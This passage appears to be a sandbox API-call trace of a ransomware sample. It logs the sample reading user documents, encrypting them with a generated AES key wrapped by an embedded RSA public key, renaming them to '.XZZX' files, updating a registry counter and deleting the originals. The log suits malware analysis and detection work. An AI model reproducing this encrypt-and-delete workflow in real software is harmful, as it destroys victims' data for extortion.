(in: hFile=0x460, lpBuffer=0x3e2ed28*, nNumberOfBytesToWrite=0x6f7, lpNumberOfBytesWritten=0x43ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e2ed28*, lpNumberOfBytesWritten=0x43ce438*=0x6f7, lpOverlapped=0x0) returned 1 [0037.981] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6f7 [0037.981] WriteFile (in: hFile=0x460, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x43ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x43ce438*=0x5, lpOverlapped=0x0) returned 1 [0037.981] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x6fc [0037.981] WriteFile (in: hFile=0x460, lpBuffer=0x43cf860*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x43ce438, lpOverlapped=0x0 | out: lpBuffer=0x43cf860*, lpNumberOfBytesWritten=0x43ce438*=0x2a, lpOverlapped=0x0) returned 1 [0037.981] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x726 [0037.981] WriteFile (in: hFile=0x460, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x43ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x43ce438*=0x5, lpOverlapped=0x0) returned 1 [0037.981] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x72b [0037.981] SetErrorMode (uMode=0x1) returned 0x1 [0037.981] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0037.981] OutputDebugStringW (lpOutputString="end") [0037.982] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wàUá\x03`Õ<\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x43cdbf4, pcbBinary=0x43cd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x43cdbf4, pcbBinary=0x43cd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0037.982] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x43cdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x43cd3dc, pcbStructInfo=0x43cd3d8 | out: pvStructInfo=0x43cd3dc, pcbStructInfo=0x43cd3d8) returned 1 [0037.982] CryptAcquireContextW (in: phProv=0x43cd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x43cd3e4*=0x3e2cf60) returned 1 [0037.982] CryptImportPublicKeyInfo (in: hCryptProv=0x3e2cf60, dwCertEncodingType=0x1, pInfo=0x3dd24d8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd2508*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd2510*, PublicKey.cUnusedBits=0x0), phKey=0x43cd3ec | out: phKey=0x43cd3ec*=0x325078) returned 1 [0037.982] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0037.983] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0037.983] CryptEncrypt (in: hKey=0x325078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x43cd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x43cd3f0*=0x80) returned 1 [0037.983] CryptEncrypt (in: hKey=0x325078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e2cfe8*, pdwDataLen=0x43cd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e2cfe8*, pdwDataLen=0x43cd3e8*=0x80) returned 1 [0037.983] WriteFile (in: hFile=0x460, lpBuffer=0x3e2cfe8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x43ce438, lpOverlapped=0x0 | out: lpBuffer=0x3e2cfe8*, lpNumberOfBytesWritten=0x43ce438*=0x80, lpOverlapped=0x0) returned 1 [0037.983] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0037.983] WriteFile (in: hFile=0x460, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x43ce438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x43ce438*=0x5, lpOverlapped=0x0) returned 1 [0037.983] GetUserNameW (in: lpBuffer=0x43ce1f8, pcbBuffer=0x43cdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x43cdfe0) returned 1 [0038.022] wsprintfW (in: param_1=0x43cdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0038.022] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x43cdfe4 | out: phkResult=0x43cdfe4*=0x474) returned 0x0 [0038.023] RegQueryValueExW (in: hKey=0x474, lpValueName="E1010314", lpReserved=0x0, lpType=0x43cdfd8, lpData=0x43cdfec, lpcbData=0x43cdfdc*=0x4 | out: lpType=0x43cdfd8*=0x4, lpData=0x43cdfec*=0x18, lpcbData=0x43cdfdc*=0x4) returned 0x0 [0038.023] RegCloseKey (hKey=0x474) returned 0x0 [0038.023] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x43cdfe8 | out: phkResult=0x43cdfe8*=0x474) returned 0x0 [0038.023] RegSetValueExW (in: hKey=0x474, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x43cdfec*=0x19, cbData=0x4 | out: lpData=0x43cdfec*=0x19) returned 0x0 [0038.023] RegCloseKey (hKey=0x474) returned 0x0 [0038.023] VirtualFree (lpAddress=0x3e50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0038.024] VirtualFree (lpAddress=0x3e60000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0038.024] CloseHandle (hObject=0x460) returned 1 [0038.025] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0038.026] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0038.026] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eL7YHoCZexIT pMk.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\el7yhoczexit pmk.docx")) returned 1 [0038.027] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\eL7YHoCZexIT pMk.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\el7yhoczexit pmk.docx")) returned 0 Thread: id = 116 os_tid = 0x57c [0037.811] lstrcpyA (in: lpString1=0x417fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0037.811] lstrcpyW (in: lpString1=0x417f460, lpString2="EtzbOnPY1PmFQ.rtf" | out: lpString1="EtzbOnPY1PmFQ.rtf") returned="EtzbOnPY1PmFQ.rtf" [0037.811] lstrcpyW (in: lpString1=0x417e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0037.811] SetErrorMode (uMode=0x1) returned 0x1 [0037.811] lstrcpyW (in: lpString1=0x417f860, lpString2="EtzbOnPY1PmFQ.rtf" | out: lpString1="EtzbOnPY1PmFQ.rtf") returned="EtzbOnPY1PmFQ.rtf" [0037.811] CoCreateGuid (in: pguid=0x417e440 | out: pguid=0x417e440*(Data1=0x1e49d9e, Data2=0xcea5, Data3=0x4863, Data4=([0]=0x83, [1]=0xc8, [2]=0xd6, [3]=0xe, [4]=0x4f, [5]=0x46, [6]=0x36, [7]=0x15))) returned 0x0 [0037.811] wsprintfW (in: param_1=0x417ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EtzbOnPY1PmFQ.rtf") returned 61 [0037.811] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x417fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0037.811] wsprintfW (in: param_1=0x417e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2F2EBAD63A6E51CF01E49D9E3E863617.XZZX") returned 81 [0037.811] StrStrW (lpFirst="EtzbOnPY1PmFQ.rtf", lpSrch="XZZX") returned 0x0 [0037.811] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EtzbOnPY1PmFQ.rtf", dwFileAttributes=0x20) returned 1 [0037.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EtzbOnPY1PmFQ.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\etzbonpy1pmfq.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0037.812] ReadFile (in: hFile=0x460, lpBuffer=0x3e2f428, nNumberOfBytesToRead=0x10207, lpNumberOfBytesRead=0x417e418, lpOverlapped=0x0 | out: lpBuffer=0x3e2f428*, lpNumberOfBytesRead=0x417e418*=0x10207, lpOverlapped=0x0) returned 1 [0037.812] CloseHandle (hObject=0x460) returned 1 [0037.812] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3eb0000 [0037.813] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3ec0000 [0037.813] SetErrorMode (uMode=0x1) returned 0x1 [0037.813] lstrcpyW (in: lpString1=0x417e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0037.813] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e2ced8) returned 1 [0037.816] CryptGenKey (in: hProv=0x3e2ced8, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x324ff8) returned 1 [0038.062] CryptExportKey (in: hKey=0x324ff8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x417e41c | out: pbData=0x0*, pdwDataLen=0x417e41c*=0x94) returned 1 [0038.062] CryptExportKey (in: hKey=0x324ff8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3ec0000, pdwDataLen=0x417e41c | out: pbData=0x3ec0000*, pdwDataLen=0x417e41c*=0x94) returned 1 [0038.062] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0038.063] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0038.063] CryptDestroyKey (hKey=0x324ff8) returned 1 [0038.063] CryptReleaseContext (hProv=0x3e2d070, dwFlags=0x0) returned 0 [0038.063] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\2F2EBAD63A6E51CF01E49D9E3E863617.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\2f2ebad63a6e51cf01e49d9e3e863617.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0038.065] WriteFile (in: hFile=0x464, lpBuffer=0x3e2f428*, nNumberOfBytesToWrite=0x10207, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x3e2f428*, lpNumberOfBytesWritten=0x417e438*=0x10207, lpOverlapped=0x0) returned 1 [0038.066] SetFilePointer (in: hFile=0x464, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x10207 [0038.066] WriteFile (in: hFile=0x464, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0038.066] SetFilePointer (in: hFile=0x464, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1020c [0038.066] WriteFile (in: hFile=0x464, lpBuffer=0x417f860*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x417f860*, lpNumberOfBytesWritten=0x417e438*=0x22, lpOverlapped=0x0) returned 1 [0038.066] SetFilePointer (in: hFile=0x464, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1022e [0038.066] WriteFile (in: hFile=0x464, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0038.066] SetFilePointer (in: hFile=0x464, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x10233 [0038.066] SetErrorMode (uMode=0x1) returned 0x1 [0038.066] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0038.066] OutputDebugStringW (lpOutputString="end") [0038.066] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----wh\x9eâ\x03`Õ\x17\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x417dbf4, pcbBinary=0x417d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0038.066] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x417dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8 | out: pvStructInfo=0x417d3dc, pcbStructInfo=0x417d3d8) returned 1 [0038.066] CryptAcquireContextW (in: phProv=0x417d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x417d3e4*=0x3e2d0f8) returned 1 [0038.067] CryptImportPublicKeyInfo (in: hCryptProv=0x3e2d0f8, dwCertEncodingType=0x1, pInfo=0x3dd25a8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3dd25d8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3dd25e0*, PublicKey.cUnusedBits=0x0), phKey=0x417d3ec | out: phKey=0x417d3ec*=0x324ff8) returned 1 [0038.067] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0038.068] GetProcAddress (hModule=0x77200000, lpProcName="CryptEncrypt") returned 0x7722779b [0038.068] CryptEncrypt (in: hKey=0x324ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x417d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x417d3f0*=0x80) returned 1 [0038.068] CryptEncrypt (in: hKey=0x324ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3e2d180*, pdwDataLen=0x417d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3e2d180*, pdwDataLen=0x417d3e8*=0x80) returned 1 [0038.068] WriteFile (in: hFile=0x464, lpBuffer=0x3e2d180*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x3e2d180*, lpNumberOfBytesWritten=0x417e438*=0x80, lpOverlapped=0x0) returned 1 [0038.068] SetFilePointer (in: hFile=0x76a31282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0038.068] WriteFile (in: hFile=0x464, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x417e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x417e438*=0x5, lpOverlapped=0x0) returned 1 [0038.068] GetUserNameW (in: lpBuffer=0x417e1f8, pcbBuffer=0x417dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x417dfe0) returned 1 [0038.068] wsprintfW (in: param_1=0x417dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0038.068] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe4 | out: phkResult=0x417dfe4*=0x474) returned 0x0 [0038.068] RegQueryValueExW (in: hKey=0x474, lpValueName="E1010314", lpReserved=0x0, lpType=0x417dfd8, lpData=0x417dfec, lpcbData=0x417dfdc*=0x4 | out: lpType=0x417dfd8*=0x4, lpData=0x417dfec*=0x19, lpcbData=0x417dfdc*=0x4) returned 0x0 [0038.068] RegCloseKey (hKey=0x474) returned 0x0 [0038.068] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x417dfe8 | out: phkResult=0x417dfe8*=0x474) returned 0x0 [0038.069] RegSetValueExW (in: hKey=0x474, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x417dfec*=0x1a, cbData=0x4 | out: lpData=0x417dfec*=0x1a) returned 0x0 [0038.069] RegCloseKey (hKey=0x474) returned 0x0 [0038.069] VirtualFree (lpAddress=0x3eb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0038.069] VirtualFree (lpAddress=0x3ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0038.069] CloseHandle (hObject=0x464) returned 1 [0038.071] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x76a20000 [0038.071] GetProcAddress (hModule=0x76a20000, lpProcName="DeleteFileW") returned 0x76a389b3 [0038.071] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EtzbOnPY1PmFQ.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\etzbonpy1pmfq.rtf")) returned 1 [0038.073] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EtzbOnPY1PmFQ.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\etzbonpy1pmfq.rtf")) returned 0 Thread: id = 117 os_tid = 0x608 [0038.028] lstrcpyA (in: lpString1=0x42cfc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0038.028] lstrcpyW (in: lpString1=0x42cf460, lpString2="PJ8NaDyMfjtJM01lTM.xlsx" | out: lpString1="PJ8NaDyMfjtJM01lTM.xlsx") returned="PJ8NaDyMfjtJM01lTM.xlsx" [0038.028] lstrcpyW (in: lpString1=0x42ce860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0038.028] SetErrorMode (uMode=0x1) returned 0x1 [0038.028] lstrcpyW (in: lpString1=0x42cf860, lpString2="PJ8NaDyMfjtJM01lTM.xlsx" | out: lpString1="PJ8NaDyMfjtJM01lTM.xlsx") returned="PJ8NaDyMfjtJM01lTM.xlsx" [0038.028] CoCreateGuid (in: pguid=0x42ce440 | out: pguid=0x42ce440*(Data1=0xc2904419, Data2=0xa1a4, Data3=0x46fb, Data4=([0]=0xb3, [1]=0x4c, [2]=0xb4, [3]=0x27, [4]=0x33, [5]=0xef, [6]=0xa8, [7]=0xdc))) returned 0x0 [0038.028] wsprintfW (in: param_1=0x42cec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PJ8NaDyMfjtJM01lTM.xlsx") returned 67 [0038.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42cfee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0038.028] wsprintfW (in: param_1=0x42ce450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5F3F59042CD153CCC290441930FE3814.XZZX") returned 81 [0038.028] StrStrW (lpFirst="PJ8NaDyMfjtJM01lTM.xlsx", lpSrch="XZZX") returned 0x0 [0038.029] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PJ8NaDyMfjtJM01lTM.xlsx", dwFileAttributes=0x20) returned 1 [0038.029] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PJ8NaDyMfjtJM01lTM.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pj8nadymfjtjm01ltm.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0038.029] ReadFile (in: hFile=0x464, lpBuffer=0x3e3f638, nNumberOfBytesToRead=0x19c5, lpNumberOfBytesRead=0x42ce418, lpOverlapped=0x0 | out: lpBuffer=0x3e3f638*, lpNumberOfBytesRead=0x42ce418*=0x19c5, lpOverlapped=0x0) returned 1 [0038.030] CloseHandle (hObject=0x464) returned 1 [0038.030] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3e50000 [0038.030] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x3e60000 [0038.031] SetErrorMode (uMode=0x1) returned 0x1 [0038.031] lstrcpyW (in: lpString1=0x42ce358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0038.031] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3e2d070) returned 1 [0038.033] CryptGenKey (in: hProv=0x3e2d070, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3251b8) returned 1 [0038.185] CryptExportKey (in: hKey=0x3251b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x42ce41c | out: pbData=0x0*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0038.186] CryptExportKey (in: hKey=0x3251b8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x3e60000, pdwDataLen=0x42ce41c | out: pbData=0x3e60000*, pdwDataLen=0x42ce41c*=0x94) returned 1 [0038.186] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x77200000 [0038.186] GetProcAddress (hModule=0x77200000, lpProcName="CryptReleaseContext") returned 0x7720e124 [0038.186] CryptDestroyKey (hKey=0x3251b8) returned 1 [0038.186] CryptReleaseContext (hProv=0x3e2d070, dwFlags=0x0) returned 0 [0038.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\5F3F59042CD153CCC290441930FE3814.XZZX" 